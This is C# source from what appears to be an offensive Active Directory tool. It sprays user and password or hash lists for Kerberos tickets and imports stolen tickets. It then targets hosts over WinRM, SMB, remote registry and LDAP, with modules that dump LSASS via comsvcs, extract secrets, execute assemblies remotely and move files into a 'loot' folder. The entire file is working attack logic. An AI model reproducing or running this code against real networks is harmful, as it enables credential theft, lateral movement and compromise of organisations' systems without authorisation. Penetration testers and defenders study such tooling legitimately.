public static void StartJob(string[] users, string domain, string[] passwords, string[] hashes, string ticket, KERB_ETYPE encType, string dc, string[] computernames, string module, string moduleargument, string path, string destination, List <string> flags)
{
AToken.MakeToken("Fake", "Fake", "Fake");
string ticketoutput;
if (String.IsNullOrEmpty(ticket))
{
foreach (string user in users)
{
var secrets = hashes.Length > 0 ? hashes : passwords;
foreach (string secret in secrets)
{
string hash;
if (passwords.Length > 0)
{
string salt = String.Format("{0}{1}", domain.ToUpper(), user);
hash = Crypto.KerberosPasswordHash(encType, secret, salt);
}
else
{
hash = secret;
}
Console.WriteLine("------------------");
Console.WriteLine(string.Format("[*] User: {0}", user));
Console.WriteLine(string.Format("[*] domain: {0}", domain));
Console.WriteLine(string.Format("[*] secret: {0}", secret));
ticketoutput = SecurityContext.AskTicket(user, domain, hash, encType, dc);
if (ticketoutput.Contains("[+] Ticket successfully imported!"))
{
Console.WriteLine("[+] Ticket successfully imported!");
}
else
{
Console.WriteLine("[-] Could not request TGT");
continue;
}
//ticket debugging
//List<LSA.SESSION_CRED> sessionCreds = LSA.EnumerateTickets(false, new LUID(), "", "", "", true);
//LSA.DisplaySessionCreds(sessionCreds, LSA.TicketDisplayFormat.Klist);
Console.WriteLine();
foreach (string computername in computernames)
{
Console.WriteLine(String.Format("[*] Checking {0}", computername));
if (!Misc.CheckHostPort(computername, 5985))
{
Console.WriteLine(String.Format("[-] Could Not Reach {0}:5985", computername));
Console.WriteLine();
continue;
}
if (!Directory.Exists(Path.Combine("loot", computername)))
{
Directory.CreateDirectory(Path.Combine("loot", computername));
}
if (module.Length == 0 || module.Contains("exec"))
{
Wsman.CheckLocalAdmin(computername, moduleargument, flags);
}
else if (module.Contains("comsvcs"))
{
Wsman.InvokeComSvcsLsassDump(computername);
}
else if (module.Contains("secrets") || module.Contains("secret"))
{
Wsman.GetSecrets(computername);
}
else if (module.Contains("assembly"))
{
Wsman.ExecuteAssembly(computername, path, moduleargument, flags);
}
else if (module.Contains("download"))
{
Wsman.CopyFile(computername, path, destination);
}
else if (module.Contains("upload"))
{
Wsman.UploadFile(computername, path, destination);
}
Console.WriteLine("");
}
}
}
}
else
{
Console.WriteLine("------------------");
Console.WriteLine(string.Format("[*] Ticket: {0}", ticket));
ticketoutput = SecurityContext.ImportTicket(ticket);
if (ticketoutput.Contains("[+] Ticket successfully imported!"))
{
Console.WriteLine("[+] TGT imported successfully!");
}
else
{
Console.WriteLine("[-] Could not import TGT");
return;
}
//ticket debugging
//List<LSA.SESSION_CRED> sessionCreds = LSA.EnumerateTickets(false, new LUID(), "", "", "", true);
//LSA.DisplaySessionCreds(sessionCreds, LSA.TicketDisplayFormat.Klist);
Console.WriteLine();
foreach (string computername in computernames)
{
Console.WriteLine(String.Format("[*] Checking {0}", computername));
if (!Misc.CheckHostPort(computername, 5985))
{
Console.WriteLine(String.Format("[-] Could Not Reach {0}:5985", computername, flags));
Console.WriteLine();
continue;
}
if (!Directory.Exists(Path.Combine("loot", computername)))
{
Directory.CreateDirectory(Path.Combine("loot", computername));
}
if (module.Length == 0 || module.Contains("exec"))
{
Wsman.CheckLocalAdmin(computername, moduleargument, flags);
}
else if (module.Contains("comsvcs"))
{
Wsman.InvokeComSvcsLsassDump(computername);
}
else if (module.Contains("secrets") || module.Contains("secret"))
{
Wsman.GetSecrets(computername);
}
else if (module.Contains("assembly"))
{
Wsman.ExecuteAssembly(computername, path, moduleargument, flags);
}
else if (module.Contains("download"))
{
Wsman.CopyFile(computername, path, destination);
}
else if (module.Contains("upload"))
{
Wsman.UploadFile(computername, path, destination);
}
Console.WriteLine("");
}
}
AToken.RevertFromToken();
}
public static void StartJob(string[] users, string domain, string[] passwords, string[] hashes, string ticket, KERB_ETYPE encType, string dc, string[] computernames, string module, string moduleargument, List <string> flags)
{
string ticketoutput;
if (String.IsNullOrEmpty(ticket))
{
foreach (string user in users)
{
var secrets = hashes.Length > 0 ? hashes : passwords;
foreach (string secret in secrets)
{
string hash;
if (passwords.Length > 0)
{
string salt = String.Format("{0}{1}", domain.ToUpper(), user);
hash = Crypto.KerberosPasswordHash(encType, secret, salt);
}
else
{
hash = secret;
}
AToken.MakeToken("Fake", "Fake", "Fake");
Console.WriteLine("------------------");
Console.WriteLine(string.Format("[*] User: {0}", user));
Console.WriteLine(string.Format("[*] domain: {0}", domain));
Console.WriteLine(string.Format("[*] secret: {0}", secret));
ticketoutput = SecurityContext.AskTicket(user, domain, hash, encType, dc);
if (ticketoutput.Contains("[+] Ticket successfully imported!"))
{
Console.WriteLine("[+] Ticket successfully imported!");
}
else
{
Console.WriteLine("[-] Could not request TGT");
continue;
}
Console.WriteLine();
foreach (string computername in computernames)
{
Console.WriteLine(String.Format("[*] Checking {0}", computername));
if (!Misc.CheckHostPort(computername, 445))
{
Console.WriteLine(String.Format("[-] Could Not Reach {0}:445", computername));
Console.WriteLine();
continue;
}
if (!Directory.Exists(Path.Combine("loot", computername)))
{
Directory.CreateDirectory(Path.Combine("loot", computername));
}
Smb.CheckLocalAdmin(computername, module);
Console.WriteLine("");
}
AToken.RevertFromToken();
}
}
}
else
{
AToken.MakeToken("Fake", "Fake", "Fake");
Console.WriteLine("------------------");
Console.WriteLine(string.Format("[*] Ticket: {0}", ticket));
ticketoutput = SecurityContext.ImportTicket(ticket);
if (ticketoutput.Contains("[+] Ticket successfully imported!"))
{
Console.WriteLine("[+] TGT imported successfully!");
}
else
{
Console.WriteLine("[-] Could not import TGT");
return;
}
Console.WriteLine();
foreach (string computername in computernames)
{
Console.WriteLine(String.Format("[*] Checking {0}", computername));
if (!Misc.CheckHostPort(computername, 445))
{
Console.WriteLine(String.Format("[-] Could Not Reach {0}:445", computername));
Console.WriteLine();
continue;
}
if (!Directory.Exists(Path.Combine("loot", computername)))
{
Directory.CreateDirectory(Path.Combine("loot", computername));
}
Smb.CheckLocalAdmin(computername, module);
Console.WriteLine("");
}
AToken.RevertFromToken();
}
}
public static void StartJob(string[] users, string domain, string[] passwords, string[] hashes, string ticket, KERB_ETYPE encType, string dc, string[] computernames, string module, string moduleargument, string path, string destination, List <string> flags, string protocol)
{
AToken.MakeToken("Fake", "Fake", "Fake");
Console.WriteLine("------------------");
if (String.IsNullOrEmpty(ticket))
{
var secrets = hashes.Length > 0 ? hashes : passwords;
foreach (string user in users)
{
foreach (string secret in secrets)
{
string hash;
if (passwords.Length > 0)
{
string salt = String.Format("{0}{1}", domain.ToUpper(), user);
hash = Crypto.KerberosPasswordHash(encType, secret, salt);
}
else
{
hash = secret;
}
Console.WriteLine(string.Format("[*] User: {0}", user));
Console.WriteLine(string.Format("[*] Domain: {0}", domain));
Console.WriteLine(string.Format("[*] Secret: {0}", secret));
string ticketoutput = SecurityContext.AskTicket(user, domain, hash, encType, dc);
if (ticketoutput.Contains("[+] Ticket successfully imported!"))
{
Console.WriteLine("[+] Ticket successfully imported!");
}
else
{
Console.WriteLine("[-] Could not request TGT");
continue;
}
if (protocol.ToLower() == "smb")
{
Scan.SMB(computernames, module);
}
else if (protocol.ToLower() == "winrm")
{
Scan.WINRM(computernames, module, moduleargument, path, destination, flags);
}
else if (protocol.ToLower() == "reg32")
{
Scan.REG32(computernames, module);
}
else if (protocol.ToLower() == "ldap")
{
Scan.LDAP(module, domain, dc);
}
}
}
}
else
{
Console.WriteLine(string.Format("[*] Ticket: {0}", ticket));
string ticketoutput = SecurityContext.ImportTicket(ticket);
if (ticketoutput.Contains("[+] Ticket successfully imported!"))
{
Console.WriteLine("[+] TGT imported successfully!");
}
else
{
Console.WriteLine("[-] Could not import TGT");
return;
}
if (protocol.ToLower() == "smb")
{
Scan.SMB(computernames, module);
}
else if (protocol.ToLower() == "winrm")
{
Scan.WINRM(computernames, module, moduleargument, path, destination, flags);
}
else if (protocol.ToLower() == "reg32")
{
Scan.REG32(computernames, module);
}
else if (protocol.ToLower() == "ldap")
{
Scan.LDAP(module, domain, dc);
}
}
AToken.RevertFromToken();
}
